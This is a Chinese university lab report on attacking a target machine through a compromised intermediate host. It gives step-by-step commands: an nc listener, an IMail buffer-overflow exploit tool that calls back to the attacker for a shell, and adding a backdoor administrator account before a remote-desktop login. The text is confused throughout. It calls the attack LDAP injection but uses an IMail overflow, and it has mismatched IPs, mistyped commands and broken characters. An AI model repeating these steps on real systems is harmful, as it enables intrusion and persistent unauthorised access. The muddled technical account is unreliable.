河南工业大学
网络攻防实验
《利用肉机攻击目标机LDAP注入漏洞攻击》
姓名:孙桂宾
学号:2
实验目的:黑客利用肉机攻击目标机开放的端口,利用肉机的目的是隐藏自己的身份,以免被发现。
LDAP是轻量目录访问协议,它是基于X.500标准的开放式标准协议。当一个Web应用程序没有正确消除用户提供的输入信息,是很有可能被攻击者改变
LDAP语句的设置。
危害ﻫ攻击者能够修改LDAP声明,这一进程将运行与组件执行的命令相同的权限。(如数据库服务器、Web应用服务器、Web服务器等)。这可能会导
致严重的安全问题,如可以查询权限外信息的权利,修改或删除LDAP树里面的
任何信息。
BUGTRAQID: 25762 ﻫIPSwitch IMail是一款基于Windows的邮件服务程序。
IPSwitch IMail的iaspam.dll中存在缓冲区溢出漏洞,远程攻击者
可能利用此漏洞控制服务器。ﻫ相关细节:
loc_1001ada5==>注意动态调试时候注意加载基址的
不同。
mov eax, [ebp+var_54]ﻫmov ecx, [eax+10c8h]
ﻫpush ecx ;char*
mov edx, [ebp+var_54]
mov eax, [edx+10d0h] ﻫpus
h eax ;char * ﻫcal
l _strcpy
add esp, 8ﻫjmp loc_1001a6f0 ﻫ这里strcpy
的两个buffer,src和dst的指针是直接从堆里读出来的,而之前没有做任何
检查,所以发送恶意邮件到服务器(SMD文件),然后在其后的偏移处控制这两个
地址,就可以拷贝任意字符串到任意内存。
环境配置:
1、目标机为:192.168.11.61
2、本地机为:192.168.11.66
3、目标机的389端口即ldap服务打开
4、本地机的c盘下存在imail、nc软件,imail为栈溢出漏洞,可以利用
该漏洞攻击对方,nc为小软件实现监听本地机器的未占用端口。
5、本地机的c盘下存在mstsc文件
实验相关知识:
2、如何看本地端口?
使用命令:netstat -an
3、黑客、肉机、目标机示意图:
肉机1在内网中,IP地址为:192.168.11.100
Internet出口地址:202.29.12.100
则:DMz administrator看到的应为即内部地址:192.168.11.100
但从cmd 中的命令行看到的是internet出口地址202.29.12.100
实验步骤:
1、本地机运行cmd命令进入命令提示状态;
提示结果:
2、测试目标机的端口389:
使用命令:telnet目标机端口
具体为:telnet 192.168.11.61389
黑客必备cmd命令大全
提示结果:当目标机389端口打开时显示黑屏,则认为目标机的389端口已打开。
3、监听目标机的端口81(80一般不用)
使用命令:nc–l –p 81//其中:-l 表示监听, -p表示端口,81和80
为本地机器的端口。
提示结果:
4、另外打开一个命令窗口,因为nc命令一直在监听81端口
方法:运行cmd
提示结果:
5、输入imail命令,进入对方机器
使用命令:imail 7_8 –t 0 –h 目标机–i 肉机–p 81 //其中:-h表示目标机,-i表示肉机
具体为:imail 7_8 –t 0 –h 192.168.11.61 –i 192.168.11.66 –p 81
提示结果:
6、在目标机中加入用户
使用命令:netuser用户名密码/add
具体为:netuser xun 123 /add
提示结果:
7、将所加用户加入组本地组
使用命令:net localgroup administrators 用户名 /add
具体为:net localgroup administrators xun /add
提示结果:
8、运行mtstc文件,连接目标机,进行用户名登陆,并且进行克隆账号
使用命令:mtstc
提示结果:
9、进入对方机器
点击连接按钮即可
实验总结:
这个实验类似于账号克隆,利用LDAP漏洞,用肉机攻击目标机,通过远程登录到目标机,在克隆账号,以便可以都可以远程控制目标机,来达到自己的目的。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。